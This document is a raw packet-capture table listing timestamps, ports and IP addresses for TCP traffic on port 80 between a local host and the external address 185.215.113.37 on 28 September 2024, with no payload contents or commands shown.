Sep 28, 2024 07:32:12.889512062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.889522076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.889525890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.889553070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.889564991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.889759064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.889774084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.889800072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.889806032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.889812946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.889816046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.889827013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.889836073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.889837980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.889847994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.889870882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.889880896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.889955044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.889965057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.889995098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890006065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890033960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890043020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890053988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890081882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890105963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890186071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890196085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890206099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890216112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890227079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890233040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890261889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890346050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890362978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890372038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890382051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890391111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890398026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890403032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890429974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890456915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890628099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890638113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890675068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890762091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890773058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890782118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890791893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890801907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890808105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890815020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890825033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890834093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890836954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890844107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.890868902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.890881062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.891055107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891066074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891074896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891104937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.891123056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.891186953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891196966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891206026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891233921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.891258001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.891374111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891391039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891402006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891410112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891419888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891423941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.891431093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891441107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891447067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.891474009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.891665936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891676903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891685963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891695023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891705036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891714096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891721010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.891725063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891733885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.891736984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.891763926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.891777992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.891992092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892003059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892011881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892016888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892020941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892031908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892036915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.892043114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892054081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892057896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.892064095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892076015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892085075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.892086029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892103910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.892118931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.892395020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892405987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892415047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892425060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892441034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.892446995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.892466068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.892486095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893090010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893129110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893138885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893142939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893171072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893178940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893269062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893280029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893290043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893300056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893309116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893317938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893342018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893419981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893430948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893467903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893491983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893585920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893596888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893605947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893615007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893625021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893634081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893636942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893646002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893660069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893666983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893687010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893711090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893891096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893901110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893909931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893919945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.893939972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.893965960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.976288080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976315022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976325989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976403952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976414919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976429939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976435900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976445913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976540089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.976563931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.976567984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976581097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976596117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976613045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.976634979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.976787090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976798058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976808071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976818085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976828098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976838112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976840019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.976850033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976857901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.976861954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976871967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.976872921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.976892948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.976908922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977083921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977097034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977138042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977144003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977179050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977209091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977221012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977230072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977241039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977251053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977256060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977262020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977273941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977294922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977312088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977484941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977495909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977510929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977520943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977530956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977533102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977543116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977554083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977555037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977564096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977571011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977576971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977591038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977605104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977624893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977818012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977833986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977844954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977855921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977860928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977863073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977871895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977881908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977883101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977896929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.977916956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.977943897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978140116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978152037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978161097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978172064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978182077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978188038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978190899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978197098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978203058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978214979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978219986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978239059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978246927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978391886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978401899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978446007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978485107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978497028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978533030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978573084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978584051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978594065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978604078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978615046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978619099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978641033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978655100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978841066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978851080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978859901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978874922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978884935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978885889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978895903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978907108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978918076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978926897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.978957891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.978957891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979034901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979034901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979034901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979207039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979218960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979228973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979238987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979249954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979259968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979270935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979285002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979310989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979362965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979379892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979397058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979407072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979412079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979423046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979434013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979441881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979446888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979449987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979458094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979464054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979470968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979494095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979655027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979697943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979857922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979868889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979878902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979890108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979899883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979911089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979912996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979921103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979931116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979935884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979935884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979943037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979954004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979960918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979964018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979974985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979984045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.979984999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.979996920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.980006933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.980007887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.980026960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.980048895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.980693102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.980721951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.980731964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.980753899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.980829954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.980840921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.980850935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.980859041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.980861902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.980868101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.980890036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.980901003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.980964899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.981003046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.981031895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.981043100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.981053114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.981064081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.981074095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.981076956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.981081963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.981111050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.981257915 CEST	80	49730	185.215.113.37	192.168.2.4
